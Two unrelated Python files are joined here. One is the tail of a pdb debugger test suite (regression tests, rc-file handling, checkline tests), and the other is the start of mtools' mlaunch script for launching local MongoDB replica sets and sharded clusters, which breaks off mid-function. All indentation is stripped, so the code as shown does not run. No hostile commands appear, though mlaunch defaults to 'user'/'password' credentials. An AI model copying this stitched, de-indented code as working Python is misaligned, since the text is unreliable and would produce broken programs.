def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(os_helper.unlink, 'bar.py')
stdout, stderr = self.run_pdb_script(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Fail to step into the caller after a return')
def test_issue13120(self):
# Invoking "continue" on a non-main thread triggered an exception
# inside signal.signal.
with open(os_helper.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb(readrc=False).set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', os_helper.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env={**os.environ, 'PYTHONIOENCODING': 'utf-8'}
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn(b'Error', stdout,
"Got an error running test script under PDB")
def test_issue36250(self):
with open(os_helper.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
evt = threading.Event()
def start_pdb():
evt.wait()
pdb.Pdb(readrc=False).set_trace()
t = threading.Thread(target=start_pdb)
t.start()
pdb.Pdb(readrc=False).set_trace()
evt.set()
t.join()""").encode('ascii'))
cmd = [sys.executable, '-u', os_helper.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env = {**os.environ, 'PYTHONIOENCODING': 'utf-8'}
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\ncont\n')
self.assertNotIn(b'Error', stdout,
"Got an error running test script under PDB")
def test_issue16180(self):
# A syntax error in the debuggee.
script = "def f: pass\n"
commands = ''
expected = "SyntaxError:"
stdout, stderr = self.run_pdb_script(script, commands)
self.assertIn(expected, stdout,
'\n\nExpected:\n{}\nGot:\n{}\n'
'Fail to handle a syntax error in the debuggee.'
.format(expected, stdout))
def test_issue26053(self):
# run command of pdb prompt echoes the correct args
script = "print('hello')"
commands = """
continue
run a b c
run d e f
quit
"""
stdout, stderr = self.run_pdb_script(script, commands)
res = '\n'.join([x.strip() for x in stdout.splitlines()])
self.assertRegex(res, "Restarting .* with arguments:\na b c")
self.assertRegex(res, "Restarting .* with arguments:\nd e f")
def test_readrc_kwarg(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb(readrc=False).set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with os_helper.temp_cwd():
with open('.pdbrc', 'w') as f:
f.write("invalid\n")
with open('main.py', 'w') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
with proc:
stdout, stderr = proc.communicate(b'q\n')
self.assertNotIn(b"NameError: name 'invalid' is not defined",
stdout)
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_readrc_homedir(self):
save_home = os.environ.pop("HOME", None)
with os_helper.temp_dir() as temp_dir, patch("os.path.expanduser"):
rc_path = os.path.join(temp_dir, ".pdbrc")
os.path.expanduser.return_value = rc_path
try:
with open(rc_path, "w") as f:
f.write("invalid")
self.assertEqual(pdb.Pdb().rcLines[0], "invalid")
finally:
if save_home is not None:
os.environ["HOME"] = save_home
def test_read_pdbrc_with_ascii_encoding(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb().set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with os_helper.temp_cwd():
with open('.pdbrc', 'w', encoding='utf-8') as f:
f.write("Fran\u00E7ais")
with open('main.py', 'w', encoding='utf-8') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
env = {'PYTHONIOENCODING': 'ascii'}
if sys.platform == 'win32':
env['PYTHONLEGACYWINDOWSSTDIO'] = 'non-empty-string'
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
env={**os.environ, **env}
)
with proc:
stdout, stderr = proc.communicate(b'c\n')
self.assertIn(b"UnicodeEncodeError: \'ascii\' codec can\'t encode character "
b"\'\\xe7\' in position 21: ordinal not in range(128)", stderr)
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_header(self):
stdout = StringIO()
header = 'Nobody expects... blah, blah, blah'
with ExitStack() as resources:
resources.enter_context(patch('sys.stdout', stdout))
resources.enter_context(patch.object(pdb.Pdb, 'set_trace'))
pdb.set_trace(header=header)
self.assertEqual(stdout.getvalue(), header + '\n')
def test_run_module(self):
script = """print("SUCCESS")"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_module_is_run_as_main(self):
script = """
if __name__ == '__main__':
print("SUCCESS")
"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_breakpoint(self):
script = """
if __name__ == '__main__':
pass
print("SUCCESS")
pass
"""
commands = """
b 3
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("Breakpoint 1 at" in l for l in stdout.splitlines()), stdout)
self.assertTrue(all("SUCCESS" not in l for l in stdout.splitlines()), stdout)
def test_run_pdb_with_pdb(self):
commands = """
c
quit
"""
stdout, stderr = self._run_pdb(["-m", "pdb"], commands)
self.assertIn(
pdb._usage,
stdout.replace('\r', '') # remove \r for windows
)
def test_module_without_a_main(self):
module_name = 't_main'
os_helper.rmtree(module_name)
init_file = module_name + '/__init__.py'
os.mkdir(module_name)
with open(init_file, 'w') as f:
pass
self.addCleanup(os_helper.rmtree, module_name)
stdout, stderr = self._run_pdb(['-m', module_name], "")
self.assertIn("ImportError: No module named t_main.__main__",
stdout.splitlines())
def test_blocks_at_first_code_line(self):
script = """
#This is a comment, on line 2
print("SUCCESS")
"""
commands = """
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("__main__.py(4)<module>()"
in l for l in stdout.splitlines()), stdout)
def test_relative_imports(self):
self.module_name = 't_main'
os_helper.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(os_helper.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import top_var
from .module import var
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
var2 = "second var"
"""))
commands = """
b 5
c
p top_var
p var
p module.var2
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
self.assertTrue(any("VAR from top" in l for l in stdout.splitlines()))
self.assertTrue(any("second var" in l for l in stdout.splitlines()))
def test_relative_imports_on_plain_module(self):
# Validates running a plain module. See bpo32691
self.module_name = 't_main'
os_helper.rmtree(self.module_name)
main_file = self.module_name + '/runme.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(os_helper.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
"""))
commands = """
b 3
c
p module.var
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name + '.runme'], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
def test_errors_in_command(self):
commands = "\n".join([
'print(',
'debug print(',
'debug doesnotexist',
'c',
])
stdout, _ = self.run_pdb_script('pass', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'-> pass',
'(Pdb) *** SyntaxError: \'(\' was never closed',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'*** SyntaxError: \'(\' was never closed',
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'> <string>(1)<module>()',
"((Pdb)) *** NameError: name 'doesnotexist' is not defined",
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ',
])
def test_issue34266(self):
'''do_run handles exceptions from parsing its arg'''
def check(bad_arg, msg):
commands = "\n".join([
f'run {bad_arg}',
'q',
])
stdout, _ = self.run_pdb_script('pass', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'-> pass',
f'(Pdb) *** Cannot run {bad_arg}: {msg}',
'(Pdb) ',
])
check('\\', 'No escaped character')
check('"', 'No closing quotation')
def test_issue42384(self):
'''When running `python foo.py` sys.path[0] is an absolute path. `python -m pdb foo.py` should behave the same'''
script = textwrap.dedent("""
import sys
print('sys.path[0] is', sys.path[0])
""")
commands = 'c\nq'
with os_helper.temp_cwd() as cwd:
expected = f'(Pdb) sys.path[0] is {os.path.realpath(cwd)}'
stdout, stderr = self.run_pdb_script(script, commands)
self.assertEqual(stdout.split('\n')[2].rstrip('\r'), expected)
@os_helper.skip_unless_symlink
def test_issue42384_symlink(self):
'''When running `python foo.py` sys.path[0] resolves symlinks. `python -m pdb foo.py` should behave the same'''
script = textwrap.dedent("""
import sys
print('sys.path[0] is', sys.path[0])
""")
commands = 'c\nq'
with os_helper.temp_cwd() as cwd:
cwd = os.path.realpath(cwd)
dir_one = os.path.join(cwd, 'dir_one')
dir_two = os.path.join(cwd, 'dir_two')
expected = f'(Pdb) sys.path[0] is {dir_one}'
os.mkdir(dir_one)
with open(os.path.join(dir_one, 'foo.py'), 'w') as f:
f.write(script)
os.mkdir(dir_two)
os.symlink(os.path.join(dir_one, 'foo.py'), os.path.join(dir_two, 'foo.py'))
stdout, stderr = self._run_pdb([os.path.join('dir_two', 'foo.py')], commands)
self.assertEqual(stdout.split('\n')[2].rstrip('\r'), expected)
def test_issue42383(self):
with os_helper.temp_cwd() as cwd:
with open('foo.py', 'w') as f:
s = textwrap.dedent("""
print('The correct file was executed')
import os
os.chdir("subdir")
""")
f.write(s)
subdir = os.path.join(cwd, 'subdir')
os.mkdir(subdir)
os.mkdir(os.path.join(subdir, 'subdir'))
wrong_file = os.path.join(subdir, 'foo.py')
with open(wrong_file, 'w') as f:
f.write('print("The wrong file was executed")')
stdout, stderr = self._run_pdb(['foo.py'], 'c\nc\nq')
expected = '(Pdb) The correct file was executed'
self.assertEqual(stdout.split('\n')[6].rstrip('\r'), expected)
class ChecklineTests(unittest.TestCase):
def setUp(self):
linecache.clearcache() # Pdb.checkline() uses linecache.getline()
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_checkline_before_debugging(self):
with open(os_helper.TESTFN, "w") as f:
f.write("print(123)")
db = pdb.Pdb()
self.assertEqual(db.checkline(os_helper.TESTFN, 1), 1)
def test_checkline_after_reset(self):
with open(os_helper.TESTFN, "w") as f:
f.write("print(123)")
db = pdb.Pdb()
db.reset()
self.assertEqual(db.checkline(os_helper.TESTFN, 1), 1)
def test_checkline_is_not_executable(self):
with open(os_helper.TESTFN, "w") as f:
# Test for comments, docstrings and empty lines
s = textwrap.dedent("""
# Comment
\"\"\" docstring \"\"\"
''' docstring '''
""")
f.write(s)
db = pdb.Pdb()
num_lines = len(s.splitlines()) + 2 # Test for EOF
for lineno in range(num_lines):
self.assertFalse(db.checkline(os_helper.TESTFN, lineno))
def load_tests(*args):
from test import test_pdb
suites = [
unittest.makeSuite(PdbTestCase),
unittest.makeSuite(ChecklineTests),
doctest.DocTestSuite(test_pdb)
]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
|
mlaunch.py
|
#!/usr/bin/env python
import Queue
import argparse
import subprocess
import threading
import os, time, sys, re
import socket
import json
import re
import warnings
import psutil
import signal
from collections import defaultdict
from mtools.util import OrderedDict
from operator import itemgetter, eq
from mtools.util.cmdlinetool import BaseCmdLineTool
from mtools.util.print_table import print_table
from mtools.version import __version__
try:
try:
from pymongo import MongoClient as Connection
from pymongo import MongoReplicaSetClient as ReplicaSetConnection
from pymongo import version_tuple as pymongo_version
from bson import SON
from StringIO import StringIO
from distutils.version import LooseVersion
except ImportError:
from pymongo import Connection
from pymongo import ReplicaSetConnection
from pymongo import version_tuple as pymongo_version
from bson import SON
from pymongo.errors import ConnectionFailure, AutoReconnect, OperationFailure, ConfigurationError
except ImportError:
raise ImportError("Can't import pymongo. See http://api.mongodb.org/python/current/ for instructions on how to install pymongo.")
# wrapper around Connection (itself conditionally a MongoClient or
# pymongo.Connection) to specify timeout if pymongo >= 3.0
class MongoConnection(Connection):
def __init__(self, *args, **kwargs):
if pymongo_version[0] >= 3:
if not 'serverSelectionTimeoutMS' in kwargs:
kwargs['serverSelectionTimeoutMS'] = 1
else:
if 'serverSelectionTimeoutMS' in kwargs:
kwargs.remove('serverSelectionTimeoutMS')
Connection.__init__(self, *args, **kwargs)
def wait_for_host(port, interval=1, timeout=30, to_start=True, queue=None):
""" Ping a mongos or mongod every `interval` seconds until it responds, or `timeout` seconds have passed. If `to_start`
is set to False, will wait for the node to shut down instead. This function can be called as a separate thread.
If queue is provided, it will place the results in the message queue and return, otherwise it will just return the result
directly.
"""
host = 'localhost:%i'%port
startTime = time.time()
while True:
if (time.time() - startTime) > timeout:
if queue:
queue.put_nowait((port, False))
return False
try:
# make connection and ping host
con = MongoConnection(host)
con.admin.command('ping')
if to_start:
if queue:
queue.put_nowait((port, True))
return True
else:
time.sleep(interval)
except Exception as e:
if to_start:
time.sleep(interval)
else:
if queue:
queue.put_nowait((port, True))
return True
def shutdown_host(port, username=None, password=None, authdb=None):
""" send the shutdown command to a mongod or mongos on given port. This function can be called as a separate thread. """
host = 'localhost:%i'%port
try:
mc = MongoConnection(host)
try:
if username and password and authdb:
if authdb != "admin":
raise RuntimeError("given username/password is not for admin database")
else:
try:
mc.admin.authenticate(name=username, password=password)
except OperationFailure:
# perhaps auth is not required
pass
mc.admin.command('shutdown', force=True)
except AutoReconnect:
pass
except OperationFailure:
print "Error: cannot authenticate to shut down %s." % host
return
except ConnectionFailure:
pass
else:
mc.close()
class MLaunchTool(BaseCmdLineTool):
def __init__(self):
BaseCmdLineTool.__init__(self)
# arguments
self.args = None
# startup parameters for each port
self.startup_info = {}
# data structures for the discovery feature
self.cluster_tree = {}
self.cluster_tags = defaultdict(list)
self.cluster_running = {}
# config docs for replica sets (key is replica set name)
self.config_docs = {}
# shard connection strings
self.shard_connection_str = []
def run(self, arguments=None):
""" This is the main run method, called for all sub-commands and parameters.
It sets up argument parsing, then calls the sub-command method with the same name.
"""
# set up argument parsing in run, so that subsequent calls to run can call different sub-commands
self.argparser = argparse.ArgumentParser()
self.argparser.add_argument('--version', action='version', version="mtools version %s" % __version__)
self.argparser.add_argument('--no-progressbar', action='store_true', default=False, help='disables progress bar')
self.argparser.description = 'script to launch MongoDB stand-alone servers, replica sets and shards.'
# make sure init is default command even when specifying arguments directly
if arguments and arguments.startswith('-'):
arguments = 'init ' + arguments
# default sub-command is `init` if none provided
elif len(sys.argv) > 1 and sys.argv[1].startswith('-') and sys.argv[1] not in ['-h', '--help', '--version']:
sys.argv = sys.argv[0:1] + ['init'] + sys.argv[1:]
# create command sub-parsers
subparsers = self.argparser.add_subparsers(dest='command')
self.argparser._action_groups[0].title = 'commands'
self.argparser._action_groups[0].description = 'init is the default command and can be omitted. To get help on individual commands, run mlaunch <command> --help'
# init command
init_parser = subparsers.add_parser('init', help='initialize a new MongoDB environment and start stand-alone instances, replica sets, or sharded clusters.',
description='initialize a new MongoDB environment and start stand-alone instances, replica sets, or sharded clusters')
# either single or replica set
me_group = init_parser.add_mutually_exclusive_group(required=True)
me_group.add_argument('--single', action='store_true', help='creates a single stand-alone mongod instance')
me_group.add_argument('--replicaset', action='store_true', help='creates replica set with several mongod instances')
# replica set arguments
init_parser.add_argument('--nodes', action='store', metavar='NUM', type=int, default=3, help='adds NUM data nodes to replica set (requires --replicaset, default=3)')
init_parser.add_argument('--arbiter', action='store_true', default=False, help='adds arbiter to replica set (requires --replicaset)')
init_parser.add_argument('--name', action='store', metavar='NAME', default='replset', help='name for replica set (default=replset)')
# sharded clusters
init_parser.add_argument('--sharded', '--shards', action='store', nargs='+', metavar='N', help='creates a sharded setup consisting of several singles or replica sets. Provide either list of shard names or number of shards.')
init_parser.add_argument('--config', action='store', default=-1, type=int, metavar='NUM', help='adds NUM config servers to sharded setup (requires --sharded, default=1, with --csrs default=3)')
init_parser.add_argument('--csrs', default=False, action='store_true', help='deploy config servers as a replica set (requires MongoDB >= 3.2.0)')
init_parser.add_argument('--mongos', action='store', default=1, type=int, metavar='NUM', help='starts NUM mongos processes (requires --sharded, default=1)')
# verbose, port, binary path
init_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
init_parser.add_argument('--port', action='store', type=int, default=27017, help='port for mongod, start of port range in case of replica set or shards (default=27017)')
init_parser.add_argument('--binarypath', action='store', default=None, metavar='PATH', help='search for mongod/s binaries in the specified PATH.')
init_parser.add_argument('--dir', action='store', default='./data', help='base directory to create db and log paths (default=./data/)')
init_parser.add_argument('--hostname', action='store', default=socket.gethostname(), help='override hostname for replica set configuration')
# authentication, users, roles
self._default_auth_roles = ['dbAdminAnyDatabase', 'readWriteAnyDatabase', 'userAdminAnyDatabase', 'clusterAdmin']
init_parser.add_argument('--auth', action='store_true', default=False, help='enable authentication and create a key file and admin user (default=user/password)')
init_parser.add_argument('--username', action='store', type=str, default='user', help='username to add (requires --auth, default=user)')
init_parser.add_argument('--password', action='store', type=str, default='password', help='password for given username (requires --auth, default=password)')
init_parser.add_argument('--auth-db', action='store', type=str, default='admin', metavar='DB', help='database where user will be added (requires --auth, default=admin)')
init_parser.add_argument('--auth-roles', action='store', default=self._default_auth_roles, metavar='ROLE', nargs='*', help='admin user''s privilege roles; note that the clusterAdmin role is required to run the stop command (requires --auth, default="%s")' % ' '.join(self._default_auth_roles))
# start command
start_parser = subparsers.add_parser('start', help='starts existing MongoDB instances. Example: "mlaunch start config" will start all config servers.',
description='starts existing MongoDB instances. Example: "mlaunch start config" will start all config servers.')
start_parser.add_argument('tags', metavar='TAG', action='store', nargs='*', default=[], help='without tags, all non-running nodes will be restarted. Provide additional tags to narrow down the set of nodes to start.')
start_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
start_parser.add_argument('--dir', action='store', default='./data', help='base directory to start nodes (default=./data/)')
start_parser.add_argument('--binarypath', action='store', default=None, metavar='PATH', help='search for mongod/s binaries in the specified PATH.')
# stop command
stop_parser = subparsers.add_parser('stop', help='stops running MongoDB instances. Example: "mlaunch stop shard 2 secondary" will stop all secondary nodes of shard 2.',
description='stops running MongoDB instances with the shutdown command. Example: "mlaunch stop shard 2 secondary" will stop all secondary nodes of shard 2.')
stop_parser.add_argument('tags', metavar='TAG', action='store', nargs='*', default=[], help='without tags, all running nodes will be stopped. Provide additional tags to narrow down the set of nodes to stop.')
stop_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
stop_parser.add_argument('--dir', action='store', default='./data', help='base directory to stop nodes (default=./data/)')
# restart command
restart_parser = subparsers.add_parser('restart', help='stops, then restarts MongoDB instances.',
description='stops running MongoDB instances with the shutdown command. Then restarts the stopped instances.')
restart_parser.add_argument('tags', metavar='TAG', action='store', nargs='*', default=[], help='without tags, all non-running nodes will be restarted. Provide additional tags to narrow down the set of nodes to start.')
restart_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
restart_parser.add_argument('--dir', action='store', default='./data', help='base directory to restart nodes (default=./data/)')
restart_parser.add_argument('--binarypath', action='store', default=None, metavar='PATH', help='search for mongod/s binaries in the specified PATH.')
# list command
list_parser = subparsers.add_parser('list', help='list MongoDB instances of this environment.',
description='list MongoDB instances of this environment.')
list_parser.add_argument('--dir', action='store', default='./data', help='base directory to list nodes (default=./data/)')
list_parser.add_argument('--tags', action='store_true', default=False, help='outputs the tags for each instance. Tags can be used to target instances for start/stop/kill.')
list_parser.add_argument('--startup', action='store_true', default=False, help='outputs the startup command lines for each instance.')
list_parser.add_argument('--verbose', action='store_true', default=False, help='alias for --tags.')
# list command
kill_parser = subparsers.add_parser('kill', help='kills (or sends another signal to) MongoDB instances of this environment.',
description='kills (or sends another signal to) MongoDB instances of this environment.')
kill_parser.add_argument('tags', metavar='TAG', action='store', nargs='*', default=[], help='without tags, all running nodes will be killed. Provide additional tags to narrow down the set of nodes to kill.')
kill_parser.add_argument('--dir', action='store', default='./data', help='base directory to kill nodes (default=./data/)')
kill_parser.add_argument('--signal', action='store', default=15, help='signal to send to processes, default=15 (SIGTERM)')
kill_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
# argparser is set up, now call base class run()
BaseCmdLineTool.run(self, arguments, get_unknowns=True)
# conditions on argument combinations
if self.args['command'] == 'init' and 'single' in self.args and self.args['single']:
if self.args['arbiter']:
self.argparser.error("can't specify --arbiter for single nodes.")
# replace path with absolute path, but store relative path as well
self.relative_dir = self.args['dir']
self.dir = os.path.abspath(self.args['dir'])
self.args['dir'] = self.dir
# branch out in sub-commands
getattr(self, self.args['command'])()
# -- below are the main commands: init, start, stop, list, kill
def init(self):
""" sub-command init. Branches out to sharded, replicaset or single node methods. """
# check for existing environment. Only allow subsequent 'mlaunch init' if they are identical.
if self._load_parameters():
if self.loaded_args != self.args:
raise SystemExit('A different environment already exists at %s.' % self.dir)
first_init = False
else:
first_init = True
# number of default config servers
if self.args['config'] == -1:
if self.args['csrs']:
self.args['config'] = 3
else:
self.args['config'] = 1
# Check if config replicaset is applicable to this version
if self.args['csrs']:
binary = "mongod"
if self.args and self.args['binarypath']:
binary = os.path.join(self.args['binarypath'], binary)
ret = subprocess.Popen(['%s --version' % binary], stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
out, err = ret.communicate()
buf = StringIO(out)
current_version = buf.readline().rstrip('\n')[-5:]
if LooseVersion(current_version) < LooseVersion("3.2.0"):
errmsg = " \n * The '--csrs' option requires MongoDB version 3.2.0 or greater, the current version is %s.\n" % current_version
raise SystemExit(errmsg)
# check if authentication is enabled, make key file
if self.args['auth'] and first_init:
if not os.path.exists(self.dir):
os.makedirs(self.dir)
os.system('openssl rand -base64 753 > %s/keyfile'%self.dir)
os.system('chmod 600 %s/keyfile'%self.dir)
# construct startup strings
self._construct_cmdlines()
# if not all ports are free, complain and suggest alternatives.
all_ports = self.get_tagged(['all'])
ports_avail = self.wait_for(all_ports, 1, 1, to_start=False)
if not all(map(itemgetter(1), ports_avail)):
dir_addon = ' --dir %s'%self.relative_dir if self.relative_dir != './data' else ''
errmsg = '\nThe following ports are not available: %s\n\n' % ', '.join( [ str(p[0]) for p in ports_avail if not p[1] ] )
errmsg += " * If you want to restart nodes from this environment, use 'mlaunch start%s' instead.\n" % dir_addon
errmsg += " * If the ports are used by a different mlaunch environment, stop those first with 'mlaunch stop --dir <env>'.\n"
errmsg += " * You can also specify a different port range with an additional '--port <startport>'\n"
raise SystemExit(errmsg)
if self.args['sharded']:
shard_names = self._get_shard_names(self.args)
# start mongod (shard and config) nodes and wait
nodes = self.get_tagged(['mongod', 'down'])
self._start_on_ports(nodes, wait=True, overrideAuth=True)
# initiate replica sets if init is called for the first time
if first_init:
if self.args['csrs']:
# Initiate config servers in a replicaset
members = sorted(self.get_tagged(["config"]))
self._initiate_replset(members[0], "configRepl")
for shard in shard_names:
# initiate replica set on first member
members = sorted(self.get_tagged([shard]))
self._initiate_replset(members[0], shard)
# add mongos
mongos = sorted(self.get_tagged(['mongos', 'down']))
self._start_on_ports(mongos, wait=True, overrideAuth=True)
if first_init:
# add shards
mongos = sorted(self.get_tagged(['mongos']))
con = MongoConnection('localhost:%i'%mongos[0])
shards_to_add = len(self.shard_connection_str)
nshards = con['config']['shards'].count()
if nshards < shards_to_add:
if self.args['replicaset']:
print "adding shards. can take up to 30 seconds..."
else:
print "adding shards."
shard_conns_and_names = zip(self.shard_connection_str, shard_names)
while True:
try:
nshards = con['config']['shards'].count()
except:
nshards = 0
if nshards >= shards_to_add:
break
for conn_str, name in shard_conns_and_names:
try:
res = con['admin'].command( SON([('addShard', conn_str), ('name', name)]) )
except Exception as e:
if self.args['verbose']:
print e, ', will retry in a moment.'
continue
if res['ok']:
if self.args['verbose']:
print "shard %s added successfully"%conn_str
shard_conns_and_names.remove( (conn_str, name) )
break
else:
if self.args['verbose']:
print res, '- will retry'
time.sleep(1)
elif self.args['single']:
# just start node
nodes = self.get_tagged(['single', 'down'])
self._start_on_ports(nodes, wait=False)
elif self.args['replicaset']:
# start nodes and wait
nodes = sorted(self.get_tagged(['mongod', 'down']))
self._start_on_ports(nodes, wait=True)
# initiate replica set
if first_init:
self._initiate_replset(nodes[0], self.args['name'])
# wait for all nodes to be running
nodes = self.get_tagged(['all'])
self.wait_for(nodes)
# now that nodes are running, add admin user if authentication enabled
if self.args['auth'] and first_init:
self.discover()
nodes = []
if self.args['sharded']:
nodes = self.get_tagged(['mongos', 'running'])
elif self.args['single']:
nodes = self.get_tagged(['single', 'running'])
elif self.args['replicaset']:
print "waiting for primary to add a user."
if self._wait_for_primary():
nodes = self.get_tagged(['primary', 'running'])
else:
raise RuntimeError("failed to find a primary, so adding admin user isn't possible")
if not nodes:
raise RuntimeError("can't connect to server, so adding admin user isn't possible")
if "clusterAdmin" not in self.args['auth_roles']:
warnings.warn("the stop command will not work with auth because the user does not have the clusterAdmin role")
self._add_user(sorted(nodes)[0], name=self.args['username'], password=self.args['password'],
database=self.args['auth_db'], roles=self.args['auth_roles'])
if self.args['verbose']:
print "added user %s on %s database" % (self.args['username'], self.args['auth_db'])
# in sharded env, if --mongos 0, kill the dummy mongos
if self.args['sharded'] and self.args['mongos'] == 0:
port = self.args['port']
print "shutting down temporary mongos on localhost:%s" % port
username = self.args['username'] if self.args['auth'] else None
password = self.args['password'] if self.args['auth'] else None
authdb = self.args['auth_db'] if self.args['auth'] else None
shutdown_host(port, username, password, authdb)
# write out parameters
if self.args['verbose']:
print "writing .mlaunch_startup file."
self._store_parameters()
# discover again, to get up-to-date info
self.discover()
# for sharded authenticated clusters, restart after first_init to enable auth
if self.args['sharded'] and self.args['auth'] and first_init:
if self.args['verbose']:
print "restarting cluster to enable auth..."
self.restart()
if self.args['verbose']:
print "done."
def stop(self):
""" sub-command stop. This method will parse the list of tags and stop the matching nodes.
Each tag has a set of nodes associated with it, and only the nodes matching all tags (intersection)
will be shut down.
"""
self.discover()
matches = self._get_ports_from_args(self.args, 'running')
if len(matches) == 0:
raise SystemExit('no nodes stopped.')
for port in matches:
if self.args['verbose']:
print "shutting down localhost:%s" % port
username = self.loaded_args['username'] if self.loaded_args['auth'] else None
password = self.loaded_args['password'] if self.loaded_args['auth'] else None
authdb = self.loaded_args['auth_db'] if self.loaded_args['auth'] else None
shutdown_host(port, username, password, authdb)
# wait until nodes are all shut down
self.wait_for(matches, to_start=False)
print "%i node%s stopped." % (len(matches), '' if len(matches) == 1 else 's')
# there is a very brief period in which nodes are not reachable anymore, but the
# port is not torn down fully yet and an immediate start command would fail. This
# very short sleep prevents that case, and it is practically not noticable by users
time.sleep(0.1)
# refresh discover
self.discover()
def start(self):
""" sub-command start. """
self.discover()
# startup_info only gets loaded from protocol version 2 on, check if it's loaded
if not self.startup_info:
# hack to make environment startable with older protocol versions < 2: try to start nodes via init if all nodes are down
if len(self.get_tagged(['down'])) == len(self.get_tagged(['all'])):
self.args = self.loaded_args
print "upgrading mlaunch environment meta-data."
return self.init()
else:
raise SystemExit("These nodes were created with an older version of mlaunch (v1.1.1 or below). To upgrade this environment and make use of the start/stop/list commands, stop all nodes manually, then run 'mlaunch start' again. You only have to do this once.")
# if new unknown_args are present, compare them with loaded ones (here we can be certain of protocol v2+)
if self.args['binarypath'] != None or (self.unknown_args and set(self.unknown_args) != set(self.loaded_unknown_args)):
# store current args, use self.args from the file (self.loaded_args)
start_args = self.args
self.args = self.loaded_args
self.args['binarypath'] = start_args['binarypath']
# construct new startup strings with updated unknown args. They are for this start only and
# will not be persisted in the .mlaunch_startup file
self._construct_cmdlines()
# reset to original args for this start command
self.args = start_args
matches = self._get_ports_from_args(self.args, 'down')
if len(matches) == 0:
raise SystemExit('no nodes started.')
# start mongod and config servers first
mongod_matches = self.get_tagged(['mongod'])
mongod_matches = mongod_matches.union(self.get_tagged(['config']))
mongod_matches = mongod_matches.intersection(matches)
self._start_on_ports(mongod_matches, wait=True)
# now start mongos
mongos_matches = self.get_tagged(['mongos']).intersection(matches)
self._start_on_ports(mongos_matches)
# wait for all matched nodes to be running
self.wait_for(matches)
# refresh discover
self.discover()
def list(self):
""" sub-command list. Takes no further parameters. Will discover the current configuration and
print a table of all the nodes with status and port.
"""
self.discover()
print_docs = []
# mongos
for node in sorted(self.get_tagged(['mongos'])):
doc = OrderedDict([ ('process','mongos'), ('port',node), ('status','running' if self.cluster_running[node] else 'down') ])
print_docs.append( doc )
if len(self.get_tagged(['mongos'])) > 0:
print_docs.append( None )
# configs
for node in sorted(self.get_tagged(['config'])):
doc = OrderedDict([ ('process','config server'), ('port',node), ('status','running' if self.cluster_running[node] else 'down') ])
print_docs.append( doc )
if len(self.get_tagged(['config'])) > 0:
print_docs.append( None )
# mongod
